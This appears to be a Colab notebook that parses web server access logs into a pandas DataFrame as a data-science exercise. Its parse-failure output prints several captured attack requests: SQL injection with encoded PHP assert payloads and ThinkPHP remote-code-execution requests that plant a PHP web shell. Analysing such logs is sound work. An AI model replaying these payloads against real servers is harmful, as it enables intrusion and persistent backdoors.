# Get Set Up

## Import Libraries

In [0]:
# Pandas provides an extremely useful data structure
import pandas as pd

# RE provides regular expression pattern matching
import re

# datetime provides a datetime object class and conversion utilities
from datetime import datetime

# Web file access
from urllib.request import urlopen

# Google tools
from google.colab import drive




## Define Some Functions

In [0]:
def log_ReadFile(logfile):
  with open(logfile) as fh:
    loglines = fh.readlines()
  loglines = [line.strip() for line in loglines]
  return loglines


def log_ReadURL(logfile):
  loglines = urlopen(logfile).readlines()
  loglines = [line.decode().strip() for line in loglines]
  return loglines

## Load Data

In [0]:
# Define vars
access_url = "https://raw.githubusercontent.com/flarmy/ds101/master/access.log.2019-03-22"
error_url = "https://raw.githubusercontent.com/flarmy/ds101/master/error.log.2019-03-22"

# Read log files into lists
access_logs = log_ReadURL(access_url)
error_logs = log_ReadURL(error_url)

# Examine Data

## Web Server Access Logs

In [31]:
# check our data type
type(access_logs)

list

In [32]:
# check data type of lists members
type(access_logs[0])

str

In [33]:
# display first 5 lines in list
display(access_logs[:5])

['101.89.29.92 - - [22/Mar/2019:01:55:15 -0700] "GET / HTTP/1.1" 200 46424 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 MicroMessenger/6.5.5 NetType/WIFI Language/en"',
 '54.36.148.43 - - [22/Mar/2019:01:57:37 -0700] "GET /self.logs/2015/access.log.2015-05-08.gz HTTP/1.1" 200 4813 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"',
 '54.36.148.18 - - [22/Mar/2019:01:58:55 -0700] "GET /self.logs/error.log.2016-04-07.gz HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"',
 '54.36.148.62 - - [22/Mar/2019:02:04:26 -0700] "GET /self.logs/access.log.2016-10-30.gz HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"',
 '54.36.149.57 - - [22/Mar/2019:02:04:51 -0700] "GET /self.logs/2016/error.log.2016-05-19.gz HTTP/1.1" 200 867 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"']

# Parse Data

## Web Server Access Logs

Regular expressions can be used to flexibly parse each line of the log file into separate fields based on a pattern.
For more info on regular expressions, check out the re library documentation
https://docs.python.org/3/library/re.html

In [0]:
# define a regex pattern to parse lines into fields
# sample line:
# ['54.36.148.18 - - [22/Mar/2019:01:58:55 -0700] "GET /self.logs/error.log.2016-04-07.gz HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"']
web_access_pattern = re.compile('(?P<client_ip>\S+)'
                                '\s+(?P<identity>\S+)'
                                '\s+(?P<username>\S+)'
                                '\s+\[(?P<date>[^\]]+)\]'
                                '\s+\"(?P<request>[^"]+)\"'
                                '\s+(?P<http_response>\d+)'
                                '\s+(?P<bytes>\d+)'
                                '\s+\"(?P<something_else>[^"]+)\"'
                                '\s+\"(?P<user_agent>.*)')


In [35]:
# test pattern on the first line of the log file to make sure it works
match = web_access_pattern.match(access_logs[0])
if match:
  display(match.group('client_ip'))
  display(match.group('identity'))
  display(match.group('username'))
  display(match.group('date'))
  display(match.group('request'))
  display(match.group('http_response'))
  display(match.group('bytes'))
  display(match.group('something_else'))
  display(match.group('user_agent'))
else:
  display("parsing failed for")
  display(access_logs[0])

'101.89.29.92'

'-'

'-'

'22/Mar/2019:01:55:15 -0700'

'GET / HTTP/1.1'

'200'

'46424'

'-'

'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 MicroMessenger/6.5.5 NetType/WIFI Language/en"'

Once the regex parses each field correctly, use it to parse each line.  Add functionality to display lines that are not parsed correctly.

In [36]:
access_logs_parsed = []  # create an empty list
for line in access_logs:
  match = web_access_pattern.match(line)
  if match:
    access_logs_parsed.append([match.group('date'), 
                               match.group('client_ip'), 
                               match.group('request'), 
                               match.group('http_response'), 
                               match.group('bytes'), 
                               match.group('something_else'), 
                               match.group('user_agent')])
  else:
    display(line)
    
#display(access_log_parsed)

'123.129.224.7 - - [22/Mar/2019:02:35:31 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:288:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'123.129.224.7 - - [22/Mar/2019:02:35:32 -0700] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=xarhm.php&content=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37 HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=xarhm.php&content=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'123.129.224.7 - - [22/Mar/2019:02:35:33 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\\"num\\";s:297:\\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:11:\\"-1\' UNION/*\\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'123.129.224.7 - - [22/Mar/2019:02:35:34 -0700] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=dflii.php&vars%5B1%5D%5B%5D=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37$ HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=dflii.php&vars[1][]=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37$" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'134.159.86.163 - - [22/Mar/2019:02:44:00 -0700] "GET //user.php?act=login HTTP/1.1" 404 295 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:280:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a324d75634768774a79776e50443977614841675a585a686243676b5831425055315262593130704f79412f506e6834654363702729293b2f2f7d787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"'

'134.159.86.163 - - [22/Mar/2019:09:05:04 -0700] "GET //user.php?act=login HTTP/1.1" 404 295 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:280:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a324d75634768774a79776e50443977614841675a585a686243676b5831425055315262593130704f79412f506e6834654363702729293b2f2f7d787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"'

'171.11.205.240 - - [22/Mar/2019:22:34:19 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:288:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'171.11.205.240 - - [22/Mar/2019:22:34:20 -0700] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=kdfai.php&content=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37 HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=kdfai.php&content=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'223.215.187.212 - - [23/Mar/2019:01:28:13 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:288:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'223.215.187.212 - - [23/Mar/2019:01:28:14 -0700] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=tmdyx.php&content=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37 HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=tmdyx.php&content=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'223.215.187.212 - - [23/Mar/2019:01:28:28 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\\"num\\";s:297:\\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:11:\\"-1\' UNION/*\\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

'223.215.187.212 - - [23/Mar/2019:01:28:29 -0700] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=fgchz.php&vars%5B1%5D%5B%5D=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37$ HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=fgchz.php&vars[1][]=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37$" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'

Interesting - looks like parse errors are occuring for some attempted SQL Injection.  This is something we would explore, but since we're just developing some skills here, let's move on.

# DataFrame

## Web Access Logs

Examine the contents of our parsed data structure.  It's handy, but could be more efficient.  Convert to a Pandas dataframe so it's easier to work with.

In [37]:
# display the first member of the access_logs_parsed list
display(access_logs_parsed[0])

['22/Mar/2019:01:55:15 -0700',
 '101.89.29.92',
 'GET / HTTP/1.1',
 '200',
 '46424',
 '-',
 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 MicroMessenger/6.5.5 NetType/WIFI Language/en"']

In [38]:
# convert to Pandas dataframe and display it
column_list = ['date', 'client_ip', 'request', 'http_response', 'bytes', 'something_else', 'user_agent']
access_logs_df = pd.DataFrame.from_records(access_logs_parsed, columns=column_list)
display(access_logs_df.head())

Unnamed: 0,date,client_ip,request,http_response,bytes,something_else,user_agent
0,22/Mar/2019:01:55:15 -0700,101.89.29.92,GET / HTTP/1.1,200,46424,-,Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like...
1,22/Mar/2019:01:57:37 -0700,54.36.148.43,GET /self.logs/2015/access.log.2015-05-08.gz H...,200,4813,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
2,22/Mar/2019:01:58:55 -0700,54.36.148.18,GET /self.logs/error.log.2016-04-07.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
3,22/Mar/2019:02:04:26 -0700,54.36.148.62,GET /self.logs/access.log.2016-10-30.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
4,22/Mar/2019:02:04:51 -0700,54.36.149.57,GET /self.logs/2016/error.log.2016-05-19.gz HT...,200,867,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...


Check out what data type each column is defined as using DataFrame.dtypes attribute

In [39]:
display(access_logs_df.dtypes)

date              object
client_ip         object
request           object
http_response     object
bytes             object
something_else    object
user_agent        object
dtype: object

## Subset / Select

Select a subset of columns

In [40]:
display(access_logs_df[['date', 'client_ip', 'http_response']].head())

Unnamed: 0,date,client_ip,http_response
0,22/Mar/2019:01:55:15 -0700,101.89.29.92,200
1,22/Mar/2019:01:57:37 -0700,54.36.148.43,200
2,22/Mar/2019:01:58:55 -0700,54.36.148.18,404
3,22/Mar/2019:02:04:26 -0700,54.36.148.62,404
4,22/Mar/2019:02:04:51 -0700,54.36.149.57,200


Select a subset of rows

In [41]:
display(access_logs_df.iloc[10:15,])

Unnamed: 0,date,client_ip,request,http_response,bytes,something_else,user_agent
10,22/Mar/2019:02:13:49 -0700,54.36.149.5,GET /self.logs/access.log.2015-09-07.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
11,22/Mar/2019:02:14:17 -0700,207.46.13.155,GET /self.logs/error.log.2017-01-27.gz HTTP/1.1,200,1708,-,Mozilla/5.0 (compatible; bingbot/2.0; +http://...
12,22/Mar/2019:02:21:56 -0700,109.201.152.248,HEAD / HTTP/1.1,301,209,https://uptime.com/secrepo.com,Mozilla/5.0 (compatible; Uptimebot/1.0; +http:...
13,22/Mar/2019:02:25:52 -0700,207.46.13.104,GET / HTTP/1.1,200,12511,-,Mozilla/5.0 (compatible; bingbot/2.0; +http://...
14,22/Mar/2019:02:26:11 -0700,216.244.66.245,GET /robots.txt HTTP/1.1,200,233,-,Mozilla/5.0 (compatible; DotBot/1.1; http://ww...


In [42]:
#101.89.29.92
access_logs_df.loc[access_logs_df['client_ip'] == '127.0.0.1',]

Unnamed: 0,date,client_ip,request,http_response,bytes,something_else,user_agent
